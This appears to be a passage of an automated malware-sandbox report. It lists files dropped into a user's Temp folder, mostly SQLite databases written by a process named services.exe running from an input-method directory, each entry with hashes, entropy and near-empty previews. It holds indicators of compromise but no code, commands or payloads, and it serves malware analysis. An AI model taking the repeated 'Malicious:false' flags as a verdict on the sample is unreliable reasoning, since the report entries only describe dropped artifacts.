                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ee1yRNQ14u

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\f3WWZ6Ifp1

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\fBARfbLGPb

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\fC7n25oOth

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\fcc8X29ZsI

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\fgewMHY8mG

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\frRfxdBtXu

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\gMaI3scL3q

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):25
                                                              Entropy (8bit):4.293660689688185
                                                              Encrypted:false
                                                              SSDEEP:3:peEvlWCqHn:pbvMXH
                                                              MD5:4B85E8C1BF9FF0855567D301904AECF7
                                                              SHA1:78BDBF80156B68D90C7BCD264CBF9761566D0CF1
                                                              SHA-256:01A74A9F0BB54E6DFCD1C73A52402B47ADD36B77E0DC716DBA642BDEADA296FD
                                                              SHA-512:2104FEEC40E0095122891DE7661335C6719760479EB1394B6588AF695F68348E97D4276CB41B8AB825CDD8A4E7FDC53C176650E4DF2327E14E08189977815879
                                                              Malicious:false
                                                              Preview:tIcNSudZeaJFNJTnsVPY7fssb

                                                              C:\Users\user\AppData\Local\Temp\gZJnkVSxDP

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\gkBbDacGkV

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\gmABxtrlmm

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\gqNivPYXZp

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\h9FpCLu2Po

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\hBJIaDVXCM

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\hT2weFkL3Q

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\hWnvxbLSi8

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\iL7NxY1Htx

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\iW5lf7oEU7

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ieo1MTpyeq

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ifGaUwUfE8

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\iplgBbNtpk

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\irrcZg0FmD

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\j9aTZ35Zq4

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\jNzU60ohTv

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
